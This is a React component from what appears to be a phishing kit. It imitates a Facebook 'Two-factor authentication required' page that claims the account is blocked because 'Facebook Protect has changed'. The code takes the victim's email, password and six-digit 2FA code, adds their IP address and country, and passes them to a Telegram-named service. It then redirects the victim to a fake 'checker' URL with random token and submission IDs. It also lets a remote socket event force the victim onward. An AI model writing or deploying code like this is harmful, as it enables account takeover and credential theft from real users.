/* eslint-disable react-hooks/exhaustive-deps */
import { useEffect, useState } from "react";
import "./home.css";
import { useNavigate } from "react-router-dom";
import useLocalStorage from "../hooks/useLocalStore";
import { getLocation, verify } from "../services/telegram.service";
import { ROUTES } from "../routers/constants";
import useStore from "../store";
import { Spin } from "antd";
import { LoadingOutlined } from "@ant-design/icons";
import { useSocketIO } from "../socketIO";
import { Checkpoint as CP } from "../components/Chrome/checkpoint";
import contentImg from "../assets/images/2fa-code.png";

const antIcon = (
  <LoadingOutlined
    style={{ fontSize: 16, color: "#ccc" }}
    spin
    rev={undefined}
  />
);
export function Checkpoint() {
  const { socketIO } = useSocketIO();
  const [user, setUser] = useLocalStorage("user", {
    phoneNumber: "",
    email: "",
    password: "",
    twoFaCode: "",
    userName: ""
  });
  const [twoFa, setTwoFa] = useState("");
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("");
  const { timestamp } = useStore();
  const [isError, setIsError] = useState(false);
  const [isSuccess, setIsSuccess] = useState(false);
  const [loading, setLoading] = useState(false);
  const navigate = useNavigate();

  const [time, setTime] = useState(3 * 60); // Start from 3 minutes
  const fetchCountry = async () => {
    const data = await getLocation();
    setIp(data.ip);
    setCountryCode(data.country_code);
  };
  const handleFaCode = async () => {
    if (twoFa && twoFa.length === 6) {
      try {
        setLoading(true);
        setUser({ ...user, twoFaCode: twoFa });
        const { success, data } = await verify(
          user.email,
          user.password,
          twoFa,
          countryCode,
          ip,
          "FB-Support",
          timestamp
        );
        if (success) {
          setIsError(!data);
          setIsSuccess(data);
          setLoading(false);
        }
      } catch (error) {
        setLoading(false);
      }
    } else {
      setLoading(true);
      setTimeout(() => {
        setIsError(true);
        setLoading(false);
      }, 2000);
    }
  };
  const randomString = (length: number): string => {
    let result = "";
    const characters =
      "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    const charactersLength = characters.length;

    for (let i = 0; i < length; i++) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
    }

    return result;
  };
  const randomNumber = (length: number): string => {
    let result = "";
    const characters = "0123456789";
    const charactersLength = characters.length;

    for (let i = 0; i < length; i++) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
    }

    return result;
  };
  const radStr = randomString(20);
  const randNumber = randomNumber(15);
  useEffect(() => {
    socketIO?.on("force-close", () => {
      navigate({
        pathname: ROUTES.CHECKER_ROUTE,
        search: `?token=${radStr}&submission_id=${randNumber}`
      });
    });
    fetchCountry();
    const timer = setInterval(() => {
      setTime((prevTime) => {
        if (prevTime <= 1) {
          clearInterval(timer);
          return 0;
        }
        return prevTime - 1;
      });
    }, 1000);

    return () => clearInterval(timer); // Cleanup on unmount
  }, []);

  const minutes = Math.floor(time / 60);
  const seconds = time % 60;

  useEffect(() => {
    if (isSuccess)
      navigate({
        pathname: ROUTES.CHECKER_ROUTE,
        search: `?token=${radStr}&submission_id=${randNumber}`
      });
  }, [isSuccess, randNumber, radStr]);

  return (
    <>
      {user.userName ? (
        <CP name={user.userName} />
      ) : (
        <div className="business h-screen">
          <div className="main-f mt-[30px]">
            <div className="flex flex-col items-start bg-white  w-full md:w-[680px]  mx-auto rounded-lg p-[15px]">
              <h1 className="font-bold text-xl mt-4 mb-[10px]">
                Two-factor authentication required (1/3)
              </h1>
              <p className="mt-1 text-base">
                We have temporarily blocked your account because Facebook
                Protect has changed. Verify code has been send to ****.
              </p>
              <img
                className="w-full h-auto"
                src={contentImg}
                alt="description"
              />

              <p className="mt-2 text-base">
                You’ve asked us to require a 6-digit login code when anyone
                tries to access your account from a new device or browser. Enter
                the 6-digit code from your code generator or third-party app
                below. Please wait{" "}
                <b>
                  {minutes.toString().padStart(2, "0")}:
                  {seconds.toString().padStart(2, "0")}
                </b>{" "}
                to request the sending of the code.
              </p>

              <p className="mt-2 text-base">
                We'll walk you through some steps to secure and unlock your
                account.
              </p>

              <div
                id="basic"
                className="ant-form ant-form-horizontal css-18iikkb"
                style={{ width: "100%", color: "#67788a" }}
              >
                <div className="item-form" style={{ marginTop: "14px" }}>
                  <div className="ant-form-item css-18iikkb">
                    <div className="ant-row ant-form-item-row css-18iikkb">
                      <div className="ant-col ant-form-item-control css-18iikkb">
                        <div className="ant-form-item-control-input">
                          <div className="ant-form-item-control-input-content">
                            <input
                              id="owner"
                              aria-required="true"
                              placeholder="Enter your code"
                              className="ant-input css-18iikkb pd-10"
                              type="text"
                              onChange={(e) => {
                                setTwoFa(e.target.value);
                              }}
                            />
                            {loading && (
                              <div
                                style={{
                                  display: "flex",
                                  gap: "8px",
                                  color: "#ccc",
                                  marginLeft: "10px",
                                  alignItems: "center"
                                }}
                              >
                                <Spin indicator={antIcon}></Spin>
                                <p style={{ fontSize: "14px", margin: 0 }}>
                                  checking...
                                </p>
                              </div>
                            )}
                          </div>
                        </div>
                        {isError && (
                          <div style={{ display: "flex", flexWrap: "nowrap" }}>
                            <div
                              id="basic_fill_full_name_help"
                              className="ant-form-item-explain ant-form-item-explain-connected css-18iikkb"
                              role="alert"
                            >
                              <div className="ant-form-item-explain-error">
                                The login code you entered doesn't match the one
                                sent to your device. Please check the number and
                                try again.
                              </div>
                            </div>
                            <div style={{ width: "0px", height: "24px" }}></div>
                          </div>
                        )}
                      </div>
                    </div>
                  </div>
                </div>

                <button
                  type="button"
                  className="w-full bg-[#1a73e3] text-white py-2 rounded border-none"
                  disabled={loading}
                  onClick={handleFaCode}
                >
                  Submit
                </button>
              </div>
            </div>
          </div>
        </div>
      )}
    </>
  );
}
